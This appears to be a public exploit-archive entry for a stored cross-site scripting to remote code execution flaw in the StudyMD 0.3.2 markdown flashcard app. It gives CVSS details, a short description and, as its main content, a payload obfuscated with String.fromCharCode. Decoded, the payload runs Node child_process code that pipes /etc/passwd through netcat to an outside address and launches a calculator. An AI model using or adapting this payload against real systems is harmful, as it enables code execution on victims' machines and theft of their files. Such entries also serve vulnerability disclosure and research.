ca3206ff78
12 changes to exploits/shellcodes Savsoft Quiz 5 - 'User Account Settings' Persistent Cross-Site Scripting Markdown Explorer 0.1.1 - XSS to RCE Xmind 2020 - XSS to RCE Tagstoo 2.0.1 - Stored XSS to RCE SnipCommand 0.1.0 - XSS to RCE Moeditor 0.2.0 - XSS to RCE Marky 0.0.1 - XSS to RCE StudyMD 0.3.2 - XSS to RCE Freeter 1.2.1 - XSS to RCE Markright 1.0 - XSS to RCE Markdownify 1.2.0 - XSS to RCE Anote 1.0 - XSS to RCE
27 lines
No EOL
3.4 KiB
JavaScript
27 lines
No EOL
3.4 KiB
JavaScript
# Exploit Title: StudyMD 0.3.2 - XSS to RCE
|
|
# Exploit Author: TaurusOmar
|
|
# Date: 04/05/2021
|
|
# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
|
|
# Risk: High (8.8)
|
|
# Vendor Homepage: https://github.com/jotron/StudyMD
|
|
# Version: 0.3.2
|
|
# Tested on: Windows, Linux, MacOs
|
|
|
|
# Software Description:
|
|
A cool app to study with markdown. Turns your Markdown-Summaries to Flashcard.
|
|
Allows user to create flash cards based on markdown files (.md) for easy viewing of their structure.
|
|
|
|
|
|
# Vulnerability Description:
|
|
The software allows you to store payloads within your flash card manager, as well as upload files (.md) once the malicious code is entered, the payload will be executed immediately. The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the
|
|
the remote attacker to get remote execution on the computer.
|
|
|
|
|
|
#Proof Video
|
|
https://imgur.com/a/lDHKEIp
|
|
|
|
|
|
|
|
# Payload: exec(AttackerReverse netcat stolen => /etc/passwd) && exec(calc)
|
|
|
|
[<audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62,60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>](http://)
|